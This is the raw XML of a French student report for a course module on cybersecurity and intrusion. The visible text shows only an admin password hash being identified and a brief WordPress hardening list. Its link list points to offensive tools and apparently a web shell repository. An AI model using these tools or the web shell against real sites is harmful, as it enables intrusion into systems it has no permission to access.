            <wp:docPr id="1992721303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1303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1D86" w14:textId="7DF49321" w:rsidR="0012677A" w:rsidRDefault="0012677A" w:rsidP="008263C5">
      <w:r>
        <w:t>Nous pouvons voir le mot de passe du compte admin chiffré. Il nous faut maintenant le déchiffrer :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43822C6D" w14:textId="73EF3C85" w:rsidR="00923822" w:rsidRDefault="00923822" w:rsidP="008263C5">
      <w:r>
        <w:t xml:space="preserve">Savoir quel est l’algorithme de chiffrement utilisé : </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00E50535">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://www.dcode.fr/identification-chiffrement</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632C8431" w14:textId="77777777" w:rsidR="00DA3E65" w:rsidRDefault="00DA3E65" w:rsidP="008263C5"/>
    <w:p w14:paraId="233C3796" w14:textId="03705511" w:rsidR="00DA3E65" w:rsidRDefault="00DA3E65" w:rsidP="008263C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Partie sécurisation de notre conteneur :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA1C17" w14:textId="43F2414F" w:rsidR="00DA3E65" w:rsidRPr="00DA3E65" w:rsidRDefault="00DA3E65" w:rsidP="008263C5">
      <w:r>
        <w:t>Mettre à jour les plugins et utiliser WordFences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291A4B63" w14:textId="178CCEE1" w:rsidR="00DA3E65" w:rsidRPr="008263C5" w:rsidRDefault="00DA3E65" w:rsidP="008263C5">
      <w:r>
        <w:t>Utiliser aussi NGROK</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DA3E65" w:rsidRPr="008263C5" w:rsidSect="00F80192">
      <w:headerReference w:type="default" r:id="rId22"/>
      <w:footerReference w:type="default" r:id="rId23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BC0A" w14:textId="77777777" w:rsidR="009042EF" w:rsidRDefault="009042EF" w:rsidP="00615F8B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03DB5499" w14:textId="77777777" w:rsidR="009042EF" w:rsidRDefault="009042EF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D964" w14:textId="22AF137F" w:rsidR="0043304F" w:rsidRDefault="0043304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D384AAD" wp14:editId="6D6E0A11">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:posOffset>-182880</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>134620</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6159500" cy="774700"/>
              <wp:effectExtent l="0" t="0" r="12700" b="25400"/>
              <wp:wrapNone/>
              <wp:docPr id="93927335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1F3B7FC3" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:-14.4pt;margin-top:10.6pt;width:485pt;height:61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" filled="f" strokecolor="black [3213]" strokeweight="1pt">
              <w10:wrap anchorx="margin"/>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
  <w:p w14:paraId="4F9346F9" w14:textId="548F90B3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F528" w14:textId="77777777" w:rsidR="009042EF" w:rsidRDefault="009042EF" w:rsidP="00615F8B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="17EC2EB6" w14:textId="77777777" w:rsidR="009042EF" w:rsidRDefault="009042EF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66B3E34C" w:rsidR="00615F8B" w:rsidRPr="0076567A" w:rsidRDefault="0043304F">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
      <w:rPr>
        <w:lang w:val="en-US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8FDB9" wp14:editId="002A5F87">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:posOffset>-182880</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-285115</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6159500" cy="774700"/>
              <wp:effectExtent l="0" t="0" r="12700" b="25400"/>
              <wp:wrapNone/>
              <wp:docPr id="124165246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5E826048" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:-14.4pt;margin-top:-22.45pt;width:485pt;height:6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" filled="f" strokecolor="black [3213]" strokeweight="1pt">
              <w10:wrap anchorx="margin"/>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidR="00615F8B" w:rsidRPr="0076567A">
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>LAFORGE Samuel</w:t>
    </w:r>
    <w:r w:rsidR="00615F8B" w:rsidRPr="0076567A">
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="00E05CC2">
      <w:rPr>
        <w:color w:val="FF0000"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Module</w:t>
    </w:r>
    <w:r w:rsidR="00DB66B3" w:rsidRPr="0076567A">
      <w:rPr>
        <w:color w:val="FF0000"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00674CFA">
      <w:rPr>
        <w:color w:val="FF0000"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Cybersécurité &amp; Intrusion</w:t>
    </w:r>
    <w:r w:rsidR="00615F8B"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DA3E65">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>5/4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0B21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EABA782E"/>
    <w:lvl w:ilvl="0" w:tplc="1752E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041"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C520FB20"/>
    <w:lvl w:ilvl="0" w:tplc="93DCC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3CF8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CDE22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142DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9DAA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86FC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7964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86D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92B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63052"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BE240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492C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="587CF53A"/>
    <w:lvl w:ilvl="0" w:tplc="9B163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11"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2031174930">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1499997033">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2106606999">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="111941571">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="593320225">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1270969273">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="501894947">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1878928932">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1489974723">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="90126440">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="72555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4EE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7403D"/>
    <w:rsid w:val="00086A84"/>
    <w:rsid w:val="000A71CB"/>
    <w:rsid w:val="000B2396"/>
    <w:rsid w:val="000B3CA1"/>
    <w:rsid w:val="000C654D"/>
    <w:rsid w:val="000D0ABD"/>
    <w:rsid w:val="000E2719"/>
    <w:rsid w:val="00112618"/>
    <w:rsid w:val="00117232"/>
    <w:rsid w:val="00117938"/>
    <w:rsid w:val="00124EC2"/>
    <w:rsid w:val="0012677A"/>
    <w:rsid w:val="00130BEB"/>
    <w:rsid w:val="00144461"/>
    <w:rsid w:val="00160359"/>
    <w:rsid w:val="00160B2A"/>
    <w:rsid w:val="00162792"/>
    <w:rsid w:val="00170C0A"/>
    <w:rsid w:val="00182701"/>
    <w:rsid w:val="00184DDF"/>
    <w:rsid w:val="001865BE"/>
    <w:rsid w:val="001A0D52"/>
    <w:rsid w:val="001A4611"/>
    <w:rsid w:val="001D2BBC"/>
    <w:rsid w:val="001F618C"/>
    <w:rsid w:val="00206ACB"/>
    <w:rsid w:val="00225895"/>
    <w:rsid w:val="002340A5"/>
    <w:rsid w:val="002365A0"/>
    <w:rsid w:val="002454B5"/>
    <w:rsid w:val="00254A06"/>
    <w:rsid w:val="00257247"/>
    <w:rsid w:val="002661C3"/>
    <w:rsid w:val="0027291B"/>
    <w:rsid w:val="0027451C"/>
    <w:rsid w:val="00274B51"/>
    <w:rsid w:val="00280FCB"/>
    <w:rsid w:val="00293744"/>
    <w:rsid w:val="0029767F"/>
    <w:rsid w:val="0029786D"/>
    <w:rsid w:val="002A22CD"/>
    <w:rsid w:val="002A3E26"/>
    <w:rsid w:val="002A53BA"/>
    <w:rsid w:val="002A5477"/>
    <w:rsid w:val="002A5D33"/>
    <w:rsid w:val="002A702D"/>
    <w:rsid w:val="002B5954"/>
    <w:rsid w:val="002B7C33"/>
    <w:rsid w:val="002C24D9"/>
    <w:rsid w:val="002C5BEE"/>
    <w:rsid w:val="002C662D"/>
    <w:rsid w:val="002D4AD0"/>
    <w:rsid w:val="002D7680"/>
    <w:rsid w:val="002E2168"/>
    <w:rsid w:val="002E285A"/>
    <w:rsid w:val="002E5B88"/>
    <w:rsid w:val="002E6245"/>
    <w:rsid w:val="002F0FAC"/>
    <w:rsid w:val="002F7069"/>
    <w:rsid w:val="002F7B4F"/>
    <w:rsid w:val="002F7C2F"/>
    <w:rsid w:val="00300CD3"/>
    <w:rsid w:val="00312680"/>
    <w:rsid w:val="00314DA2"/>
    <w:rsid w:val="00322A35"/>
    <w:rsid w:val="00323C77"/>
    <w:rsid w:val="00332028"/>
    <w:rsid w:val="00337480"/>
    <w:rsid w:val="00341ACB"/>
    <w:rsid w:val="00345592"/>
    <w:rsid w:val="00353075"/>
    <w:rsid w:val="00365ACD"/>
    <w:rsid w:val="00380360"/>
    <w:rsid w:val="003843BB"/>
    <w:rsid w:val="00384841"/>
    <w:rsid w:val="003968B9"/>
    <w:rsid w:val="00397BD0"/>
    <w:rsid w:val="003A1E52"/>
    <w:rsid w:val="003A4978"/>
    <w:rsid w:val="003B3561"/>
    <w:rsid w:val="003C1688"/>
    <w:rsid w:val="003D1436"/>
    <w:rsid w:val="003E0ABE"/>
    <w:rsid w:val="003E208A"/>
    <w:rsid w:val="003E770A"/>
    <w:rsid w:val="003F64B9"/>
    <w:rsid w:val="004045A0"/>
    <w:rsid w:val="0040471B"/>
    <w:rsid w:val="00407F61"/>
    <w:rsid w:val="00412EAA"/>
    <w:rsid w:val="00421E45"/>
    <w:rsid w:val="004223A8"/>
    <w:rsid w:val="0042463E"/>
    <w:rsid w:val="00427B28"/>
    <w:rsid w:val="00427BEB"/>
    <w:rsid w:val="0043304F"/>
    <w:rsid w:val="00436F8F"/>
    <w:rsid w:val="00450BCF"/>
    <w:rsid w:val="004553CB"/>
    <w:rsid w:val="00455454"/>
    <w:rsid w:val="00457309"/>
    <w:rsid w:val="004574E3"/>
    <w:rsid w:val="00466322"/>
    <w:rsid w:val="00471D15"/>
    <w:rsid w:val="00473254"/>
    <w:rsid w:val="00482F59"/>
    <w:rsid w:val="00493ECD"/>
    <w:rsid w:val="00494458"/>
    <w:rsid w:val="00494D45"/>
    <w:rsid w:val="004961CB"/>
    <w:rsid w:val="004A5D76"/>
    <w:rsid w:val="004B7896"/>
    <w:rsid w:val="004C659E"/>
    <w:rsid w:val="004D1286"/>
    <w:rsid w:val="004D7424"/>
    <w:rsid w:val="004D7DF7"/>
    <w:rsid w:val="004E575E"/>
    <w:rsid w:val="004F4A5D"/>
    <w:rsid w:val="005041E7"/>
    <w:rsid w:val="00504585"/>
    <w:rsid w:val="00513171"/>
    <w:rsid w:val="00516281"/>
    <w:rsid w:val="00527A33"/>
    <w:rsid w:val="00543EDB"/>
    <w:rsid w:val="00557A7E"/>
    <w:rsid w:val="00566AA7"/>
    <w:rsid w:val="00572DEA"/>
    <w:rsid w:val="00575792"/>
    <w:rsid w:val="0057582F"/>
    <w:rsid w:val="0058117B"/>
    <w:rsid w:val="00595D7D"/>
    <w:rsid w:val="005970D4"/>
    <w:rsid w:val="005A282D"/>
    <w:rsid w:val="005A298F"/>
    <w:rsid w:val="005A3169"/>
    <w:rsid w:val="005A383A"/>
    <w:rsid w:val="005A546C"/>
    <w:rsid w:val="005B0E1D"/>
    <w:rsid w:val="005B38E5"/>
    <w:rsid w:val="005B5E30"/>
    <w:rsid w:val="005C4F33"/>
    <w:rsid w:val="005C5A96"/>
    <w:rsid w:val="005C62AA"/>
    <w:rsid w:val="005D11E3"/>
    <w:rsid w:val="005E4DF5"/>
    <w:rsid w:val="0060034A"/>
    <w:rsid w:val="00600420"/>
    <w:rsid w:val="00606E9A"/>
    <w:rsid w:val="00615F8B"/>
    <w:rsid w:val="00636ED9"/>
    <w:rsid w:val="00637B16"/>
    <w:rsid w:val="00642724"/>
    <w:rsid w:val="00642EE0"/>
    <w:rsid w:val="0066336C"/>
    <w:rsid w:val="00671ECE"/>
    <w:rsid w:val="00674B31"/>
    <w:rsid w:val="00674CFA"/>
    <w:rsid w:val="00675AA6"/>
    <w:rsid w:val="00680ECF"/>
    <w:rsid w:val="00681C99"/>
    <w:rsid w:val="006825EF"/>
    <w:rsid w:val="0068565B"/>
    <w:rsid w:val="00690A60"/>
    <w:rsid w:val="00696844"/>
    <w:rsid w:val="006B5D2D"/>
    <w:rsid w:val="006D0CB6"/>
    <w:rsid w:val="006E393D"/>
    <w:rsid w:val="006E55AD"/>
    <w:rsid w:val="006F1F1F"/>
    <w:rsid w:val="007016E5"/>
    <w:rsid w:val="00724F4B"/>
    <w:rsid w:val="00726540"/>
    <w:rsid w:val="00734DFA"/>
    <w:rsid w:val="00736F34"/>
    <w:rsid w:val="00743979"/>
    <w:rsid w:val="00744024"/>
    <w:rsid w:val="00753C55"/>
    <w:rsid w:val="0076567A"/>
    <w:rsid w:val="00767123"/>
    <w:rsid w:val="00767593"/>
    <w:rsid w:val="00771CB1"/>
    <w:rsid w:val="00787B3A"/>
    <w:rsid w:val="00787E83"/>
    <w:rsid w:val="00793964"/>
    <w:rsid w:val="00796374"/>
    <w:rsid w:val="0079741B"/>
    <w:rsid w:val="007A3DC3"/>
    <w:rsid w:val="007B130D"/>
    <w:rsid w:val="007B7D4D"/>
    <w:rsid w:val="007C10B0"/>
    <w:rsid w:val="007C1B4F"/>
    <w:rsid w:val="007F5A4E"/>
    <w:rsid w:val="007F69F6"/>
    <w:rsid w:val="008040F1"/>
    <w:rsid w:val="008221B6"/>
    <w:rsid w:val="00822D43"/>
    <w:rsid w:val="00824765"/>
    <w:rsid w:val="00825C14"/>
    <w:rsid w:val="008263C5"/>
    <w:rsid w:val="00827013"/>
    <w:rsid w:val="00827639"/>
    <w:rsid w:val="00841AFD"/>
    <w:rsid w:val="00844069"/>
    <w:rsid w:val="00863EBB"/>
    <w:rsid w:val="008640D1"/>
    <w:rsid w:val="00882408"/>
    <w:rsid w:val="008827EA"/>
    <w:rsid w:val="008874FE"/>
    <w:rsid w:val="008917EA"/>
    <w:rsid w:val="008A46F3"/>
    <w:rsid w:val="008B4F7B"/>
    <w:rsid w:val="008B51A2"/>
    <w:rsid w:val="008B6DA2"/>
    <w:rsid w:val="008B7652"/>
    <w:rsid w:val="008C292A"/>
    <w:rsid w:val="008F6A4E"/>
    <w:rsid w:val="009042EF"/>
    <w:rsid w:val="00905232"/>
    <w:rsid w:val="00906189"/>
    <w:rsid w:val="009064C3"/>
    <w:rsid w:val="00911493"/>
    <w:rsid w:val="00911D84"/>
    <w:rsid w:val="00914772"/>
    <w:rsid w:val="009147BB"/>
    <w:rsid w:val="0091731E"/>
    <w:rsid w:val="009178F4"/>
    <w:rsid w:val="00923822"/>
    <w:rsid w:val="0095183B"/>
    <w:rsid w:val="00953199"/>
    <w:rsid w:val="009554E8"/>
    <w:rsid w:val="0096255C"/>
    <w:rsid w:val="00963EC2"/>
    <w:rsid w:val="00991248"/>
    <w:rsid w:val="00994867"/>
    <w:rsid w:val="009A149D"/>
    <w:rsid w:val="009B2B50"/>
    <w:rsid w:val="009B7FF3"/>
    <w:rsid w:val="009C35ED"/>
    <w:rsid w:val="009C43A5"/>
    <w:rsid w:val="009C4BFF"/>
    <w:rsid w:val="009D4956"/>
    <w:rsid w:val="009D610A"/>
    <w:rsid w:val="009E4DF4"/>
    <w:rsid w:val="009E57A8"/>
    <w:rsid w:val="009F3725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25D7"/>
    <w:rsid w:val="00A36ABB"/>
    <w:rsid w:val="00A4061B"/>
    <w:rsid w:val="00A576B7"/>
    <w:rsid w:val="00A6230C"/>
    <w:rsid w:val="00A631F2"/>
    <w:rsid w:val="00A740CE"/>
    <w:rsid w:val="00A74475"/>
    <w:rsid w:val="00A913A3"/>
    <w:rsid w:val="00AB4333"/>
    <w:rsid w:val="00AC7277"/>
    <w:rsid w:val="00AD44A5"/>
    <w:rsid w:val="00AE0E21"/>
    <w:rsid w:val="00AE113F"/>
    <w:rsid w:val="00AE4F38"/>
    <w:rsid w:val="00AE7DAC"/>
    <w:rsid w:val="00B03B0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8733B"/>
    <w:rsid w:val="00B90948"/>
    <w:rsid w:val="00BA05B8"/>
    <w:rsid w:val="00BB02DB"/>
    <w:rsid w:val="00BB11BD"/>
    <w:rsid w:val="00BB636B"/>
    <w:rsid w:val="00BC1985"/>
    <w:rsid w:val="00BD1805"/>
    <w:rsid w:val="00BD211A"/>
    <w:rsid w:val="00BD390B"/>
    <w:rsid w:val="00BD4AB8"/>
    <w:rsid w:val="00BD56F5"/>
    <w:rsid w:val="00BD5845"/>
    <w:rsid w:val="00BE1F16"/>
    <w:rsid w:val="00BE7BBC"/>
    <w:rsid w:val="00C228E8"/>
    <w:rsid w:val="00C26B03"/>
    <w:rsid w:val="00C27B27"/>
    <w:rsid w:val="00C3101A"/>
    <w:rsid w:val="00C37142"/>
    <w:rsid w:val="00C421C2"/>
    <w:rsid w:val="00C4445E"/>
    <w:rsid w:val="00C46518"/>
    <w:rsid w:val="00C6280C"/>
    <w:rsid w:val="00C63225"/>
    <w:rsid w:val="00C6363D"/>
    <w:rsid w:val="00C67BBF"/>
    <w:rsid w:val="00C705DD"/>
    <w:rsid w:val="00C732BC"/>
    <w:rsid w:val="00CA0546"/>
    <w:rsid w:val="00CA0A58"/>
    <w:rsid w:val="00CA7F06"/>
    <w:rsid w:val="00CB117E"/>
    <w:rsid w:val="00CC108A"/>
    <w:rsid w:val="00CD2DC6"/>
    <w:rsid w:val="00CD5EAE"/>
    <w:rsid w:val="00CE3C1C"/>
    <w:rsid w:val="00CF583A"/>
    <w:rsid w:val="00D16EE7"/>
    <w:rsid w:val="00D23FBD"/>
    <w:rsid w:val="00D24E2C"/>
    <w:rsid w:val="00D30DA5"/>
    <w:rsid w:val="00D322E9"/>
    <w:rsid w:val="00D40A66"/>
    <w:rsid w:val="00D44273"/>
    <w:rsid w:val="00D44716"/>
    <w:rsid w:val="00D4476A"/>
    <w:rsid w:val="00D54590"/>
    <w:rsid w:val="00D569F2"/>
    <w:rsid w:val="00D56F45"/>
    <w:rsid w:val="00D650CC"/>
    <w:rsid w:val="00D6573C"/>
    <w:rsid w:val="00D719A0"/>
    <w:rsid w:val="00D74DC3"/>
    <w:rsid w:val="00D85038"/>
    <w:rsid w:val="00DA0B4A"/>
    <w:rsid w:val="00DA2824"/>
    <w:rsid w:val="00DA38D4"/>
    <w:rsid w:val="00DA3E65"/>
    <w:rsid w:val="00DA51D7"/>
    <w:rsid w:val="00DA77F3"/>
    <w:rsid w:val="00DB57B3"/>
    <w:rsid w:val="00DB66B3"/>
    <w:rsid w:val="00DB772B"/>
    <w:rsid w:val="00DC1602"/>
    <w:rsid w:val="00DC726A"/>
    <w:rsid w:val="00DD794A"/>
    <w:rsid w:val="00DE2C59"/>
    <w:rsid w:val="00DE3172"/>
    <w:rsid w:val="00DE3E9C"/>
    <w:rsid w:val="00DF44A6"/>
    <w:rsid w:val="00DF49E4"/>
    <w:rsid w:val="00E00564"/>
    <w:rsid w:val="00E03EAC"/>
    <w:rsid w:val="00E05CC2"/>
    <w:rsid w:val="00E07410"/>
    <w:rsid w:val="00E11954"/>
    <w:rsid w:val="00E1474F"/>
    <w:rsid w:val="00E14896"/>
    <w:rsid w:val="00E1577E"/>
    <w:rsid w:val="00E216B5"/>
    <w:rsid w:val="00E23F8D"/>
    <w:rsid w:val="00E3158C"/>
    <w:rsid w:val="00E318BA"/>
    <w:rsid w:val="00E34A30"/>
    <w:rsid w:val="00E57FBA"/>
    <w:rsid w:val="00E60EBD"/>
    <w:rsid w:val="00E6164B"/>
    <w:rsid w:val="00E706FB"/>
    <w:rsid w:val="00E723DF"/>
    <w:rsid w:val="00E878C9"/>
    <w:rsid w:val="00E973A2"/>
    <w:rsid w:val="00EA3736"/>
    <w:rsid w:val="00EB04C5"/>
    <w:rsid w:val="00EB2A3E"/>
    <w:rsid w:val="00EC596F"/>
    <w:rsid w:val="00EC6D82"/>
    <w:rsid w:val="00ED7C7D"/>
    <w:rsid w:val="00EE3422"/>
    <w:rsid w:val="00EE6942"/>
    <w:rsid w:val="00EF63D1"/>
    <w:rsid w:val="00F06452"/>
    <w:rsid w:val="00F14CD7"/>
    <w:rsid w:val="00F20BBF"/>
    <w:rsid w:val="00F22596"/>
    <w:rsid w:val="00F248D8"/>
    <w:rsid w:val="00F4173B"/>
    <w:rsid w:val="00F56741"/>
    <w:rsid w:val="00F6296F"/>
    <w:rsid w:val="00F63D8A"/>
    <w:rsid w:val="00F73790"/>
    <w:rsid w:val="00F80192"/>
    <w:rsid w:val="00F804AC"/>
    <w:rsid w:val="00F84DFF"/>
    <w:rsid w:val="00F866B8"/>
    <w:rsid w:val="00F93EB5"/>
    <w:rsid w:val="00F96131"/>
    <w:rsid w:val="00FA3CE3"/>
    <w:rsid w:val="00FB27BF"/>
    <w:rsid w:val="00FC0502"/>
    <w:rsid w:val="00FC1C68"/>
    <w:rsid w:val="00FC5FCE"/>
    <w:rsid w:val="00FD275D"/>
    <w:rsid w:val="00FD3304"/>
    <w:rsid w:val="00FD364D"/>
    <w:rsid w:val="00FE17B3"/>
    <w:rsid w:val="00FE2769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192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F80192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  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Terminal">
    <w:name w:val="Terminal"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00CA0A58"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
      <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hgkelc">
    <w:name w:val="hgkelc"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="004D1286"/>
  </w:style>
  <w:style w:type="character" w:styleId="CodeHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C1688"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="cf-tweet-this">
    <w:name w:val="cf-tweet-this"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002B7C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B7C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5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etasploit.com/docs/using-metasploit/getting-started/nightly-installers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dcode.fr/identification-chiffr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qlmap.org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_Wordpress/ai/jquery.ph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pcraft.io/install/searchsploit/ubun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kifarunix.com/install-wpscan-on-ubuntu-20-04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ChoiSG/vwp" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Yudas1337/NINJA_SHEL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897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44</cp:revision>
  <cp:lastPrinted>2023-05-04T14:53:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-04T08:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-04T14:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>